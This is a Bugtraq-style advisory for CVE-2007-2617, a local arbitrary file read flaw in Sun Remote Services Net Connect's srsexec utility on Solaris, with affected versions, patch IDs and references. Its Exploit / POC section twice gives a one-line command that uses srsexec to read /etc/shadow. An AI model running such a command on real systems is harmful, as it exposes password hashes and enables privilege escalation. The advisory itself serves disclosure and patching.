Sun Microsystems Solaris SRSEXEC Arbitrary File Read Local Information Disclosure Vulnerability
BID:23915
Info
Sun Microsystems Solaris SRSEXEC Arbitrary File Read Local Information Disclosure Vulnerability
| Bugtraq ID: | 23915 |
| Class: | Design Error |
| CVE: |
CVE-2007-2617 |
| Remote: | No |
| Local: | Yes |
| Published: | May 10 2007 12:00AM |
| Updated: | May 07 2015 05:39PM |
| Credit: | An anonymous researcher is credited with the discovery of this vulnerability. |
| Vulnerable: |
Sun Sun Remote Services (SRS) Net Connect Software 3.2.4 Sun Sun Remote Services (SRS) Net Connect Software 3.2.3 |
| Not Vulnerable: | |
Discussion
Sun Microsystems Solaris SRSEXEC Arbitrary File Read Local Information Disclosure Vulnerability
Sun Microsystems Solaris is prone to a local information-disclosure vulnerability due to a design error.
A local attacker may exploit this issue to access sensitive information, including superuser password information, that may lead to further attacks. A complete compromise is possible.
Sun Microsystems Solaris is prone to a local information-disclosure vulnerability due to a design error.
A local attacker may exploit this issue to access sensitive information, including superuser password information, that may lead to further attacks. A complete compromise is possible.
Exploit / POC
Sun Microsystems Solaris SRSEXEC Arbitrary File Read Local Information Disclosure Vulnerability
An attacker can exploit this issue by gaining local access to a vulnerable computer and running the 'srsexec' utility on a protected file.
The following exploit example is available:
$ /opt/SUNWsrspx/bin/srsexec -dvb /etc/shadow OWNED
An attacker can exploit this issue by gaining local access to a vulnerable computer and running the 'srsexec' utility on a protected file.
The following exploit example is available:
$ /opt/SUNWsrspx/bin/srsexec -dvb /etc/shadow OWNED
Solution / Fix
Sun Microsystems Solaris SRSEXEC Arbitrary File Read Local Information Disclosure Vulnerability
Solution:
The vendor released updates to address this issue. Please see the references for more information.
Sun Sun Remote Services (SRS) Net Connect Software 3.2.3
Sun Sun Remote Services (SRS) Net Connect Software 3.2.4
Solution:
The vendor released updates to address this issue. Please see the references for more information.
Sun Sun Remote Services (SRS) Net Connect Software 3.2.3
-
Sun 125713-01
http://sunsolve.sun.com/patches/
Sun Sun Remote Services (SRS) Net Connect Software 3.2.4
-
Sun 123870-02
http://sunsolve.sun.com/patches/
References
Sun Microsystems Solaris SRSEXEC Arbitrary File Read Local Information Disclosure Vulnerability
References:
References:
- iDefense Security Advisory 05.10.07: Sun Microsystems Solaris SRS Proxy Core srs (iDefense Labs)
- Solaris Homepage (Sun Microsystems)
- Sun Alert ID 102891 Security Vulnerability in Sun Remote Services (SRS) Net Conn (Sun Microsystems)
- iDefense Security Advisory 05.10.07: Sun Microsystems Solaris SRS Proxy Core srs (iDefense Labs)